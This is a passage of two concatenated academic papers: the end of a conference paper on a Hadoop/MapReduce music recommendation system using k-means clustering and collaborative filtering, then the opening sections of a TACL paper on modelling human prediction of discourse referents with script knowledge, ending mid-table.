assigned to their respective clusters. Algorithm architecture is shown in Figure 4. MapReduce数据源 HDFS userlog.txt songtags.txt User record mapping Song label mapping UTMatrixMapper UTMatrixReduce User Label Matrix KMeansMapper KMeansReducer KMeansDriver Cluster Center User clustering KMeansClusterMapper KMeansCombiner Figure 4. Distributed k-means clustering algorithm architecture B. Concurrent Design of User-based Collaborative Filtering Recommendation Algorithm According to the formula (1) and (2) in the first section, combined with the rules of Hadoop distributed design, the following steps are designed for the recommendation algorithm: The first step is to count how many songs each user listens to; the second step is to count the number of times each song is heard; the third step is to calculate the similarity of every two users, but only the similarity of the two users who have heard the same song need to be computed; the fourth step, is to calculate each user's recommending value for each song to form a recommend list; The final step is to sum up the recommending values for a user listening to the same song. The above steps are implemented based on MapReduce, and the entire work flow requires a number of Map and Reduce to complete. Figure 5 shows the MapReduce architecture based on the user collaborative filtering algorithm. UserListenCountMapper UserListenCountReduce SongListenedCountMapper SongListenedCountReduce UserSimilarityMapper UserSimilarityReduce UserCommendSimMapper UserCommendLogMapper UserCommendReducer MapReduce userlog.txt Mapping user listening records User songs recorded and the number The number of songs to be heard User similarity file 源数据 User song interest value HDFS Generate recommended results UserSongValueMapper UserSongValueReducer Figure 5. Distributed architecture based on user collaborative filtering algorithm V. EXPERIMENTS AND EVALUATION In the same situation as the data-set, many times of repeated experiments were done on the traditional user-based collaborative filtering algorithm, the recommendation algorithm after introducing K-means clustering and the recommendation algorithm after the improved clustering. And the stable results were selected to analyze [11]. A. Experimental environment and data set 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 131 Environment construction and configuration include Hadoop cluster, Sqoop, development environment and Web server. The cluster environment is built using VMware virtual machines. The cluster is built using three nodes, one Master and two Slaves.  Host configuration Hardware environment: CPU Intel i5-4590, quad-core, 3.30 GHz, RAM 8 GB;  Software Environment: OS Centos7, java Environment jdk1.8, server tomcat8.0, hadoop 2.7.4;  Development environment: Eclipse, windows10, hadoop.plugin;  Music data used in this experiment are from the network, including more than 50,000 users, more than 1,700,000 user operations, and 730 tags. B. Results Show Figure 6 shows a screenshot of the recommended results for the Android phone. Figure 6. Android mobile music recommended results C. Evaluation Indices The Precision and Recall [12] are used as evaluation indices.Each user's song date is sorted in descending order, with the top 80% as the training set, and the remaining 20% as the test set for experimental evaluation. %100 results drecommende ofnumber The results drecommende ofnumber correct The Precision   %100 like users ofnumber The results drecommende ofnumber correct The Recall  （） Formula (8) and formula (9) are calculated formulas for the Precision and Recall respectively. D. The line contrast chart of three algorithms After repeated experiments that the precision of three algorithms changes with the K-value is shown in line chart as Figure 7: As shown in Figure 7, the precision after introducing the K-means clustering algorithm is better than the traditional collaborative filtering algorithm, and when the K value is 4, the precision is increased by about 0.65%, which is the best classification. After the clustering algorithm is improved, the precision is nearly 0.15% higher than unimproved when the K value is 5. Figure 8 is the Recall change chart for three algorithms. The Recall of K-means clustering algorithm is better than that of the traditional collaborative filtering algorithm, and when the K value is 4, the Recall can increase about 0.65%. When the K value is 5, the Recall increases nearly 0.15% after the clustering algorithm is improved; but as the K value increases, the improved clustering is lower than the unimproved clustering algorithm. Because the user number is fixed, after removing the free point, each classification will be affected. Some classification number is very few, then the recommended result is inaccurate, thus the whole effect of the recommendation algorithm is affected. Figure 7. The change of precision with K value 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 132 Figure 8. The change chart of recall with K value VI. CONCLUDING REMARKS This paper puts forward the design and implementation of the Hadoop-based music recommendation system, and improves the traditional user-based collaborative filtering recommendation algorithm, and improves the precision of the recommendation algorithm by using the song tag for users clustering. Hadoop, a scalable and high-performance distributed computing platform, provides a reference for the design of a music recommendation system in the background of large data. The recommendation algorithm of K-means clustering and collaborative filtering is designed based on MapReduce distributed framework, which has some reference significance for the distributed design of the recommendation algorithm. REFERENCES [1] Trustdata. China Mobile Internet Development Analysis Report for the First Half of 2017 [EB/OL]. (2017-07-30). http://itrustdata.com/#service [2] Xiang Liang Recommended system practice[M].BeiJing:People Post Press,2012.6:1-3Zhang Xin-sheng Zhang Hai-ying Mao Qian.Hadoop[EB/OL].(2016-12-19).https://baike.baidu.com/item/Ha doop/3526507 [3] Wu Hongchen, WangXinjun,ChengYong,PengZhaohui. Advanced Recommendation Base on Collaborative Filtering and Partition Clustering[J].Computer Research and Development,2011,48(S3):205-212. [4] ZhengJie.Machine Learning Algorithm Principles and Programming Practice[M].BeiJing.Electronic Industry Press,2015.10:141 [5] Weston J, Bengio S, Hamel P, et al. Large-Scale Music Annotation and Retrieval: Learning to Rank in Joint Semantic Spaces.[J]. arXiv: Learning, 2011. [6] Den Oord A V, Dieleman S, Schrauwen B, et al. Deep content-based music recommendation[C]. neural information processing systems, 2013: 2643-2651. [7] Su J, Chang W, Tseng V S, et al. Personalized Music Recommendation by Mining Social Media Tags[J]. Procedia Computer Science, 2013: 303-312. [8] Avidson J, Liebald B, Liu J, et al. The YouTube video recommendation system[C].conference on recommender systems, 2010: 293-296. [9] FENG Ya-li,JIANGJie,TianFeng.Research on the combined recommendation algorithm based on item and user[J].Information Technology,2017,(10):69-73. [10] CHANG Xiao yu,YU Zheng sheng.Point-of-interest Recommendation Algorithm Introducing Time Attenuation Item[J].Journal of Hangzhou Dianzi University(Natural Sciences),2016,36(03):42-46. [2017-09-19]. DOI ： 10.13954/j.cnki.hdu.2016.03.009 [11] Zhao Z, Shang M. User-Based Collaborative-Filtering Recommendation Algorithms on Hadoop[C]. knowledge discovery and data mining, 2010: 478-481. [12] Chen Yaxi.Music recommendation system and related technologies [J]. Computer Engineering and Applications,2012,48(18):9-16+47. work_2dw3vuoprfdbdnrfirx5jj7jme ---- Edinburgh Research Explorer Modeling Semantic Expectation: Using Script Knowledge for Referent Prediction Citation for published version: Modi, A, Titov, I, Demberg, V, Sayeed, A & Pinkal, M 2017, 'Modeling Semantic Expectation: Using Script Knowledge for Referent Prediction', Transactions of the Association for Computational Linguistics, vol. 5, pp. 31-44. Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://www.transacl.org/ojs/index.php/tacl/article/view/968 https://www.research.ed.ac.uk/portal/en/publications/modeling-semantic-expectation-using-script-knowledge-for-referent-prediction(01c319a9-4ee1-4b73-af5a-9ac0aad76603).html Modeling Semantic Expectation: Using Script Knowledge for Referent Prediction Ashutosh Modi1,3 Ivan Titov2,4 Vera Demberg1,3 Asad Sayeed1,3 Manfred Pinkal1,3 1 {ashutosh,vera,asayeed,pinkal}@coli.uni-saarland.de 2 titov@uva.nl 3 Universität des Saarlandes, Germany 4 ILLC, University of Amsterdam, the Netherlands Abstract Recent research in psycholinguistics has pro- vided increasing evidence that humans predict upcoming content. Prediction also affects per- ception and might be a key to robustness in human language processing. In this paper, we investigate the factors that affect human prediction by building a computational model that can predict upcoming discourse referents based on linguistic knowledge alone vs. lin- guistic knowledge jointly with common-sense knowledge in the form of scripts. We find that script knowledge significantly improves model estimates of human predictions. In a second study, we test the highly controversial hypothesis that predictability influences refer- ring expression type but do not find evidence for such an effect. 1 Introduction Being able to anticipate upcoming content is a core property of human language processing (Kutas et al., 2011; Kuperberg and Jaeger, 2016) that has re- ceived a lot of attention in the psycholinguistic liter- ature in recent years. Expectations about upcoming words help humans comprehend language in noisy settings and deal with ungrammatical input. In this paper, we use a computational model to address the question of how different layers of knowledge (lin- guistic knowledge as well as common-sense knowl- edge) influence human anticipation. Here we focus our attention on semantic pre- dictions of discourse referents for upcoming noun phrases. This task is particularly interesting because it allows us to separate the semantic task of antic- ipating an intended referent and the processing of the actual surface form. For example, in the con- text of I ordered a medium sirloin steak with fries. Later, the waiter brought . . . , there is a strong ex- pectation of a specific discourse referent, i.e., the referent introduced by the object NP of the preced- ing sentence, while the possible referring expression could be either the steak I had ordered, the steak, our food, or it. Existing models of human predic- tion are usually formulated using the information- theoretic concept of surprisal. In recent work, how- ever, surprisal is usually not computed for DRs, which represent the relevant semantic unit, but for the surface form of the referring expressions, even though there is an increasing amount of literature suggesting that human expectations at different lev- els of representation have separable effects on pre- diction and, as a consequence, that the modelling of only one level (the linguistic surface form) is in- sufficient (Kuperberg and Jaeger, 2016; Kuperberg, 2016; Zarcone et al., 2016). The present model ad- dresses this shortcoming by explicitly modelling and representing common-sense knowledge and concep- tually separating the semantic (discourse referent) and the surface level (referring expression) expec- tations. Our discourse referent prediction task is related to the NLP task of coreference resolution, but it substantially differs from that task in the following ways: 1) we use only the incrementally available left context, while coreference resolution uses the full text; 2) coreference resolution tries to identify the DR for a given target NP in context, while we look at the expectations of DRs based only on the context 31 Transactions of the Association for Computational Linguistics, vol. 5, pp. 31–44, 2017. Action Editor: Hwee Tou Ng. Submission batch: 8/2016 Revision batch: 10/2016; Published 1/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. before the target NP is seen. The distinction between referent prediction and prediction of referring expressions also allows us to study a closely related question in natural language generation: the choice of a type of referring expres- sion based on the predictability of the DR that is intended by the speaker. This part of our work is inspired by a referent guessing experiment by Tily and Piantadosi (2009), who showed that highly pre- dictable referents were more likely to be realized with a pronoun than unpredictable referents, which were more likely to be realized using a full NP. The effect they observe is consistent with a Gricean point of view, or the principle of uniform information den- sity (see Section 5.1). However, Tily and Piantadosi do not provide a computational model for estimat- ing referent predictability. Also, they do not include selectional preference or common-sense knowledge effects in their analysis. We believe that script knowledge, i.e., common- sense knowledge about everyday event sequences, represents a good starting point for modelling con- versational anticipation. This type of common-sense knowledge includes temporal structure which is par- ticularly relevant for anticipation in continuous lan- guage processing. Furthermore, our approach can build on progress that has been made in recent years in methods for acquiring large-scale script knowl- edge; see Section 1.1. Our hypothesis is that script knowledge may be a significant factor in human an- ticipation of discourse referents. Explicitly mod- elling this knowledge will thus allow us to produce more human-like predictions. Script knowledge enables our model to generate anticipations about discourse referents that have al- ready been mentioned in the text, as well as anticipa- tions about textually new discourse referents which have been activated due to script knowledge. By modelling event sequences and event participants, our model captures many more long-range depen- dencies than normal language models are able to. As an example, consider the following two alternative text passages: We got seated, and had to wait for 20 minutes. Then, the waiter brought the ... We ordered, and had to wait for 20 minutes. Then, the waiter brought the ... Preferred candidate referents for the object posi- tion of the waiter brought the ... are instances of the food, menu, or bill participant types. In the con- text of the alternative preceding sentences, there is a strong expectation of instances of a menu and a food participant, respectively. This paper represents foundational research in- vestigating human language processing. However, it also has the potential for application in assistant technology and embodied agents. The goal is to achieve human-level language comprehension in re- alistic settings, and in particular to achieve robust- ness in the face of errors or noise. Explicitly mod- elling expectations that are driven by common-sense knowledge is an important step in this direction. In order to be able to investigate the influence of script knowledge on discourse referent expecta- tions, we use a corpus that contains frequent refer- ence to script knowledge, and provides annotations for coreference information, script events and par- ticipants (Section 2). In Section 3, we present a large-scale experiment for empirically assessing hu- man expectations on upcoming referents, which al- lows us to quantify at what points in a text humans have very clear anticipations vs. when they do not. Our goal is to model human expectations, even if they turn out to be incorrect in a specific instance. The experiment was conducted via Mechanical Turk and follows the methodology of Tily and Pianta- dosi (2009). In section 4, we describe our computa- tional model that represents script knowledge. The model is trained on the gold standard annotations of the corpus, because we assume that human compre- henders usually will have an analysis of the preced- ing discourse which closely corresponds to the gold standard. We compare the prediction accuracy of this model to human predictions, as well as to two baseline models in Section 4.3. One of them uses only structural linguistic features for predicting ref- erents; the other uses general script-independent se- lectional preference features. In Section 5, we test whether surprisal (as estimated from human guesses vs. computational models) can predict the type of referring expression used in the original texts in the corpus (pronoun vs. full referring expression). This experiment also has wider implications with respect to the on-going discussion of whether the referring expression choice is dependent on predictability, as predicted by the uniform information density hy- 32 (I)(1)P bather [decided]E wash to take a (bath)(2)P bath yesterday afternoon after working out . Once (I)(1)P bather got back home , (I)(1)P bather [walked]E enter bathroom to (my)(1)P bather (bathroom)(3)P bathroom and first quickly scrubbed the (bathroom tub)(4)P bathtub by [turning on]E turn water on the (water)(5)P water and rinsing (it)(4)P bathtub clean with a rag . After (I)(1)P bather finished , (I)(1)P bather [plugged]E close drain the (tub)(4)P bathtub and began [filling]E fill water (it)(4)P bathtub with warm (water)(5)P water set at about 98 (degrees)(6)P temperature . Figure 1: An excerpt from a story in the InScript corpus. The referring expressions are in parentheses, and the corresponding discourse referent label is given by the superscript. Referring expressions of the same discourse referent have the same color and superscript number. Script-relevant events are in square brackets and colored in orange. Event type is indicated by the corresponding subscript. pothesis. The contributions of this paper consist of: • a large dataset of human expectations, in a va- riety of texts related to every-day activities. • an implementation of the conceptual distinction between the semantic level of referent predic- tion and the type of a referring expression. • a computational model which significantly im- proves modelling of human anticipations. • showing that script knowledge is a significant factor in human expectations. • testing the hypothesis of Tily and Piantadosi that the choice of the type of referring expres- sion (pronoun or full NP) depends on the pre- dictability of the referent. 1.1 Scripts Scripts represent knowledge about typical event sequences (Schank and Abelson, 1977), for exam- ple the sequence of events happening when eating at a restaurant. Script knowledge thereby includes events like order, bring and eat as well as partici- pants of those events, e.g., menu, waiter, food, guest. Existing methods for acquiring script knowledge are based on extracting narrative chains from text (Chambers and Jurafsky, 2008; Chambers and Juraf- sky, 2009; Jans et al., 2012; Pichotta and Mooney, 2014; Rudinger et al., 2015; Modi, 2016; Ahrendt and Demberg, 2016) or by eliciting script knowledge via Crowdsourcing on Mechanical Turk (Regneri et al., 2010; Frermann et al., 2014; Modi and Titov, 2014). Modelling anticipated events and participants is motivated by evidence showing that event repre- sentations in humans contain information not only about the current event, but also about previous and future states, that is, humans generate anticipa- tions about event sequences during normal language comprehension (Schütz-Bosbach and Prinz, 2007). Script knowledge representations have been shown to be useful in NLP applications for ambiguity reso- lution during reference resolution (Rahman and Ng, 2012). 2 Data: The InScript Corpus Ordinary texts, including narratives, encode script structure in a way that is too complex and too im- plicit at the same time to enable a systematic study of script-based expectation. They contain interleaved references to many different scripts, and they usually refer to single scripts in a point-wise fashion only, relying on the ability of the reader to infer the full event chain using their background knowledge. We use the InScript corpus (Modi et al., 2016) to study the predictive effect of script knowledge. In- Script is a crowdsourced corpus of simple narrative texts. Participants were asked to write about a spe- cific activity (e.g., a restaurant visit, a bus ride, or a grocery shopping event) which they personally ex- perienced, and they were instructed to tell the story as if explaining the activity to a child. This resulted in stories that are centered around a specific scenario and that explicitly mention mundane details. Thus, they generally realize longer event chains associated with a single script, which makes them particularly appropriate to our purpose. The InScript corpus is labelled with event-type, participant-type, and coreference information. Full verbs are labeled with event type information, heads of all noun phrases with participant types, using scenario-specific lists of event types (such as enter bathroom, close drain and fill water for the “taking a bath” scenario) and participant types (such as bather, water and bathtub). On average, each template of- fers a choice of 20 event types and 18 participant 33 (I)(1) decided to take a (bath)(2) yesterday afternoon after working out . Once (I)(1) got back home , (I)(1) walked to (my)(1) (bathroom)(3) and first quickly scrubbed the (bathroom tub)(4) by turning on the (water)(5) and rinsing (it)(4) clean with a rag . Af- ter (I)(1) finished , (I)(1) plugged XXXXXX Figure 2: An illustration of the Mechanical Turk exper- iment for the referent cloze task. Workers are supposed to guess the upcoming referent (indicated by XXXXXX above). They can either choose from the previously acti- vated referents, or they can write something new. 0 5 1 0 1 5 2 0 14 5 1 DR_4 (P_bathtub) the drain (new DR) DR_1 (P_bather) N u m b e r o f W o rk e rs Figure 3: Response of workers corresponding to the story in Fig. 2. Workers guessed two already activated dis- course referents (DR) DR 4 and DR 1. Some of the workers also chose the “new” option and wrote different lexical variants of “bathtub drain”, a new DR correspond- ing to the participant type “the drain”. types. The InScript corpus consists of 910 stories ad- dressing 10 scenarios (about 90 stories per scenario). The corpus has 200,000 words, 12,000 verb in- stances with event labels, and 44,000 head nouns with participant instances. Modi et al. (2016) report an inter-annotator agreement of 0.64 for event types and 0.77 for participant types (Fleiss’ kappa). We use gold-standard event- and participant-type annotation to study the influence of script knowl- edge on the expectation of discourse referents. In addition, InScript provides coreference annotation, which makes it possible to keep track of the men- tioned discourse referents at each point in the story. We use this information in the computational model of DR prediction and in the DR guessing experiment described in the next section. An example of an an- notated InScript story is shown in Figure 1. 3 Referent Cloze Task We use the InScript corpus to develop computa- tional models for the prediction of discourse refer- ents (DRs) and to evaluate their prediction accuracy. This can be done by testing how often our models manage to reproduce the original discourse referent (cf. also the “narrative cloze” task by (Chambers and Jurafsky, 2008) which tests whether a verb together with a role can be correctly guessed by a model). However, we do not only want to predict the “cor- rect” DRs in a text but also to model human expec- tation of DRs in context. To empirically assess hu- man expectation, we created an additional database of crowdsourced human predictions of discourse ref- erents in context using Amazon Mechanical Turk. The design of our experiment closely resembles the guessing game of (Tily and Piantadosi, 2009) but ex- tends it in a substantial way. Workers had to read stories of the InScript corpus 1 and guess upcoming participants: for each target NP, workers were shown the story up to this NP ex- cluding the NP itself, and they were asked to guess the next person or object most likely to be referred to. In case they decided in favour of a discourse ref- erent already mentioned, they had to choose among the available discourse referents by clicking an NP in the preceding text, i.e., some noun with a specific, coreference-indicating color; see Figure 2. Other- wise, they would click the “New” button, and would in turn be asked to give a short description of the new person or object they expected to be mentioned. The percentage of guesses that agree with the actually re- ferred entity was taken as a basis for estimating the surprisal. The experiment was done for all stories of the test set: 182 stories (20%) of the InScript corpus, evenly taken from all scenarios. Since our focus is on the effect of script knowledge, we only consid- ered those NPs as targets that are direct dependents of script-related events. Guessing started from the third sentence only in order to ensure that a mini- mum of context information was available. To keep the complexity of the context manageable, we re- stricted guessing to a maximum of 30 targets and skipped the rest of the story (this applied to 12% of the stories). We collected 20 guesses per NP for 3346 noun phrase instances, which amounts to a to- tal of around 67K guesses. Workers selected a con- 1The corpus is available at : http://www.sfb1102. uni-saarland.de/?page_id=2582 34 http://www.sfb1102.uni-saarland.de/?page_id=2582 http://www.sfb1102.uni-saarland.de/?page_id=2582 text NP in 68% of cases and “New” in 32% of cases. Our leading hypothesis is that script knowledge substantially influences human expectation of dis- course referents. The guessing experiment provides a basis to estimate human expectation of already mentioned DRs (the number of clicks on the respec- tive NPs in text). However, we expect that script knowledge has a particularly strong influence in the case of first mentions. Once a script is evoked in a text, we assume that the full script structure, includ- ing all participants, is activated and available to the reader. Tily and Piantadosi (2009) are interested in sec- ond mentions only and therefore do not make use of the worker-generated noun phrases classified as “New”. To study the effect of activated but not explicitly mentioned participants, we carried out a subsequent annotation step on the worker-generated noun phrases classified as “New”. We presented an- notators with these noun phrases in their contexts (with co-referring NPs marked by color, as in the M- Turk experiment) and, in addition, displayed all par- ticipant types of the relevant script (i.e., the script as- sociated with the text in the InScript corpus). Anno- tators did not see the “correct” target NP. We asked annotators to either (1) select the participant type in- stantiated by the NP (if any), (2) label the NP as un- related to the script, or (3), link the NP to an overt antecedent in the text, in the case that the NP is ac- tually a second mention that had been erroneously labeled as new by the worker. Option (1) provides a basis for a fine-grained estimation of first-mention DRs. Option (3), which we added when we noticed the considerable number of overlooked antecedents, serves as correction of the results of the M-Turk ex- periment. Out of the 22K annotated “New” cases, 39% were identified as second mentions, 55% were linked to a participant type, and 6% were classified as really novel. 4 Referent Prediction Model In this section, we describe the model we use to predict upcoming discourse referents (DRs). 4.1 Model Our model should not only assign probabilities to DRs already explicitly introduced in the preced- ing text fragment (e.g., “bath” or “bathroom” for the cloze task in Figure 2) but also reserve some prob- ability mass for ‘new’ DRs, i.e., DRs activated via the script context or completely novel ones not be- longing to the script. In principle, different variants of the activation mechanism must be distinguished. For many participant types, a single participant be- longing to a specific semantic class is expected (re- ferred to with the bathtub or the soap). In contrast, the “towel’ participant type may activate a set of ob- jects, elements of which then can be referred to with a towel or another towel. The “bath means” partici- pant type may even activate a group of DRs belong- ing to different semantic classes (e.g., bubble bath and salts). Since it is not feasible to enumerate all potential participants, for ‘new’ DRs we only pre- dict their participant type (“bath means” in our ex- ample). In other words, the number of categories in our model is equal to the number of previously introduced DRs plus the number of participant types of the script plus 1, reserved for a new DR not corre- sponding to any script participant (e.g., cellphone). In what follows, we slightly abuse the terminology and refer to all these categories as discourse refer- ents. Unlike standard co-reference models, which pre- dict co-reference chains relying on the entire docu- ment, our model is incremental, that is, when pre- dicting a discourse referent d(t) at a given position t, it can look only in the history h(t) (i.e., the pre- ceding part of the document), excluding the refer- ring expression (RE) for the predicted DR. We also assume that past REs are correctly resolved and as- signed to correct participant types (PTs). Typical NLP applications use automatic coreference reso- lution systems, but since we want to model human behavior, this might be inappropriate, since an au- tomated system would underestimate human perfor- mance. This may be a strong assumption, but for reasons explained above, we use gold standard past REs. We use the following log-linear model (“softmax regression”): p(d(t) = d|h(t)) = exp(w T f(d,h(t)))∑ d′ exp(w T f(d′,h(t))) , where f is the feature function we will discuss in the following subsection, w are model parameters, and the summation in the denominator is over the 35 Feature Type Recency Shallow Linguistic Frequency Shallow Linguistic Grammatical function Shallow Linguistic Previous subject Shallow Linguistic Previous object Shallow Linguistic Previous RE type Shallow Linguistic Selectional preferences Linguistic Participant type fit Script Predicate schemas Script Table 1: Summary of feature types set of categories described above. Some of the features included in f are a func- tion of the predicate syntactically governing the unobservable target RE (corresponding to the DR being predicted). However, in our incremental setting, the predicate is not available in the his- tory h(t) for subject NPs. In this case, we use an additional probabilistic model, which esti- mates the probability of the predicate v given the context h(t), and marginalize out its predictions: p(d(t) =d|h(t))= ∑ v p(v|h(t)) exp(w T f(d,h(t),v))∑ d′ exp(w T f(d′,h(t),v)) The predicate probabilities p(v|h(t)) are computed based on the sequence of preceding predicates (i.e., ignoring any other words) using the recurrent neural network language model estimated on our training set.2 The expression f(d,h(t),v) denotes the feature function computed for the referent d, given the history composed of h(t) and the predicate v. 4.2 Features Our features encode properties of a DR as well as characterize its compatibility with the context. We face two challenges when designing our fea- tures. First, although the sizes of our datasets are respectable from the script annotation perspective, they are too small to learn a richly parameterized model. For many of our features, we address this challenge by using external word embeddings3 and associate parameters with some simple similarity measures computed using these embeddings. Con- 2We used RNNLM toolkit (Mikolov et al., 2011; Mikolov et al., 2010) with default settings. 3We use 300-dimensional word embeddings estimated on Wikipedia with the skip-gram model of Mikolov et al. (2013): https://code.google.com/p/word2vec/ sequently, there are only a few dozen parameters which need to be estimated from scenario-specific data. Second, in order to test our hypothesis that script information is beneficial for the DR prediction task, we need to disentangle the influence of script information from general linguistic knowledge. We address this by carefully splitting the features apart, even if it prevents us from modeling some interplay between the sources of information. We will de- scribe both classes of features below; also see a sum- mary in Table 1. 4.2.1 Shallow Linguistic Features These features are based on Tily and Pianta- dosi (2009). In addition, we consider a selectional preference feature. Recency feature. This feature captures the distance lt(d) between the position t and the last occurrence of the candidate DR d. As a distance measure, we use the number of sentences from the last mention and exponentiate this number to make the depen- dence more extreme; only very recent DRs will re- ceive a noticeable weight: exp(−lt(d)). This feature is set to 0 for new DRs. Frequency. The frequency feature indicates the number of times the candidate discourse referent d has been mentioned so far. We do not perform any bucketing. Grammatical function. This feature encodes the dependency relation assigned to the head word of the last mention of the DR or a special none label if the DR is new. Previous subject indicator. This binary feature in- dicates whether the candidate DR d is coreferential with the subject of the previous verbal predicate. Previous object indicator. The same but for the ob- ject position. Previous RE type. This three-valued feature indi- cates whether the previous mention of the candidate DR d is a pronoun, a non-pronominal noun phrase, or has never been observed before. 4.2.2 Selectional Preferences Feature The selectional preference feature captures how well the candidate DR d fits a given syntactic po- sition r of a given verbal predicate v. It is com- puted as the cosine similarity simcos(xTd ,xv,r) of a vector-space representation of the DR xd and a structured vector-space representation of the pred- 36 https://code.google.com/p/word2vec/ icate xv,r. The similarities are calculated using a Distributional Memory approach similar to that of Baroni and Lenci (2010). Their structured vector space representation has been shown to work well on tasks that evaluate correlation with human the- matic fit estimates (Baroni and Lenci, 2010; Baroni et al., 2014; Sayeed et al., 2016) and is thus suited to our task. The representation xd is computed as an aver- age of head word representations of all the previ- ous mentions of DR d, where the word vectors are obtained from the TypeDM model of Baroni and Lenci (2010). This is a count-based, third-order co- occurrence tensor whose indices are a word w0, a second word w1, and a complex syntactic relation r, which is used as a stand-in for a semantic link. The values for each (w0,r,w1) cell of the tensor are the local mutual information (LMI) estimates obtained from a dependency-parsed combination of large cor- pora (ukWaC, BNC, and Wikipedia). Our procedure has some differences with that of Baroni and Lenci. For example, for estimating the fit of an alternative new DR (in other words, xd based on no previous mentions), we use an aver- age over head words of all REs in the training set, a “null referent.” xv,r is calculated as the average of the top 20 (by LMI) r-fillers for v in TypeDM; in other words, the prototypical instrument of rub may be represented by summing vectors like towel, soap, eraser, coin. . . If the predicate has not yet been en- countered (as for subject positions), scores for all scenario-relevant verbs are emitted for marginaliza- tion. 4.2.3 Script Features In this section, we describe features which rely on script information. Our goal will be to show that such common-sense information is beneficial in per- forming DR prediction. We consider only two script features. Participant type fit This feature characterizes how well the participant type (PT) of the candidate DR d fits a specific syn- tactic role r of the governing predicate v; it can be regarded as a generalization of the selectional prefer- ence feature to participant types and also its special- isation to the considered scenario. Given the candi- date DR d, its participant type p, and the syntactic (I)(1) decided to take a (bath)(2) yesterday afternoon after working out . (I)(1) was getting ready to go out and needed to get cleaned before (I)(1) went so (I)(1) decided to take a (bath)(2). (I)(1) filled the (bath- tub)(3) with warm (water)(4) and added some (bub- ble bath)(5). (I)(1) got undressed and stepped into the (water)(4). (I)(1) grabbed the (soap)(5) and rubbed it on (my)(1) (body)(7) and rinsed XXXXXX Figure 4: An example of the referent cloze task. Similar to the Mechanical Turk experiment (Figure 2), our refer- ent prediction model is asked to guess the upcoming DR. relation r, we collect all the predicates in the train- ing set which have the participant type p in the posi- tion r. The embedding of the DR xp,r is given by the average embedding of these predicates. The feature is computed as the dot product of xp,r and the word embedding of the predicate v. Predicate schemas The following feature captures a specific aspect of knowledge about prototypical sequences of events. This knowledge is called predicate schemas in the recent co-reference modeling work of Peng et al. (2015). In predicate schemas, the goal is to model pairs of events such that if a DR d participated in the first event (in a specific role), it is likely to partici- pate in the second event (again, in a specific role). For example, in the restaurant scenario, if one ob- serves a phrase John ordered, one is likely to see John waited somewhere later in the document. Spe- cific arguments are not that important (where it is John or some other DR), what is important is that the argument is reused across the predicates. This would correspond to the rule X-subject-of-order → X-subject-of-eat.4 Unlike the previous work, our dataset is small, so we cannot induce these rules di- rectly as there will be very few rules, and the model would not generalize to new data well enough. In- stead, we again encode this intuition using similari- ties in the real-valued embedding space. Recall that our goal is to compute a feature ϕ(d,h(t)) indicating how likely a potential DR d is to follow, given the history h(t). For example, imag- 4In this work, we limit ourselves to rules where the syntactic function is the same on both sides of the rule. In other words, we can, in principle, encode the pattern X pushed Y → X apologized but not the pattern X pushed Y → Y cried. 37 Model Name Feature Types Features Base Shallow Linguistic Features Recency, Frequency, Grammatical function, Previous subject, Previous object Linguistic Shallow Linguistic Features + Linguistic Feature Recency, Frequency, Grammatical function, Previous subject, Previous object + Selectional Preferences Script Shallow Linguistic Features + Linguistic Feature + Script Features Recency, Frequency, Grammatical function, Previous subject, Previous object + Selectional Preferences + Participant type fit, Predicate schemas Table 2: Summary of model features ine that the model is asked to predict the DR marked by XXXXXX in Figure 4. Predicate-schema rules can only yield previously introduced DRs, so the score ϕ(d,h(t)) = 0 for any new DR d. Let us use “soap” as an example of a previously introduced DR and see how the feature is computed. In order to choose which inference rules can be applied to yield “soap”, we can inspect Figure 4. There are only two preceding predicates which have DR “soap” as their object (rubbed and grabbed), resulting in two poten- tial rules X-object-of-grabbed → X-object-of-rinsed and X-object-of-rubbed → X-object-of-rinsed. We define the score ϕ(d,h(t)) as the average of the rule scores. More formally, we can write ϕ(d,h(t))= 1 |N(d,h(t))| ∑ (u,v,r)∈N(d,h(t)) ψ(u,v,r), (1) where ψ(u,v,r) is the score for a rule X-r-of-u → X-r-of-v, N(d,h(t)) is the set of applicable rules, and |N(d,h(t))| denotes its cardinality.5 We define ϕ(d,h(t)) as 0, when the set of applicable rules is empty (i.e. |N(d,h(t))| = 0). The scoring function ψ(u,v,r) as a linear func- 5In all our experiments, rather than considering all potential predicates in the history to instantiate rules, we take into ac- count only 2 preceding verbs. In other words, u and v can be interleaved by at most one verb and |N(d, h(t))| is in {0, 1, 2}. tion of a joint embedding xu,v of verbs u and v: ψ(u,v,r) = αTr xu,v. The two remaining questions are (1) how to define the joint embeddings xu,v, and (2) how to estimate the parameter vector αr. The joint embedding of two predicates, xu,v, can, in principle, be any composi- tion function of embeddings of u and v, for example their sum or component-wise product. Inspired by Bordes et al. (2013), we use the difference between the word embeddings: ψ(u,v,r) = αTr (xu −xv), where xu and xv are external embeddings of the corresponding verbs. Encoding the succession re- lation as translation in the embedding space has one desirable property: the scoring function will be largely agnostic to the morphological form of the predicates. For example, the difference between the embeddings of rinsed and rubbed is very sim- ilar to that of rinse and rub (Botha and Blunsom, 2014), so the corresponding rules will receive simi- lar scores. Now, we can rewrite the equation (1) as ϕ(d,h(t))= αT r(h(t)) ∑ (u,v,r)∈N(d,h(t)) (xu −xv) |N(d,h(t))| (2) where r(h(t)) denotes the syntactic function corre- sponding to the DR being predicted (object in our example). As for the parameter vector αr, there are again a number of potential ways how it can be estimated. For example, one can train a discriminative classifier to estimate the parameters. However, we opted for a simpler approach—we set it equal to the empirical estimate of the expected feature vector xu,v on the training set:6 αr = 1 Dr ∑ l,t δr(r(h (l,t))) ∑ (u,v,r′)∈N(d(l,t),h(l,t)) (xu −xv), (3) where l refers to a document in the training set, t is (as before) a position in the document, h(l,t) and 6This essentially corresponds to using the Naive Bayes model with the simplistic assumption that the score differences are normally distributed with spherical covariance matrices. 38 Scenario Human Model Script Model Linguistic Model Tily Model Accuracy Perplexity Accuracy Perplexity Accuracy 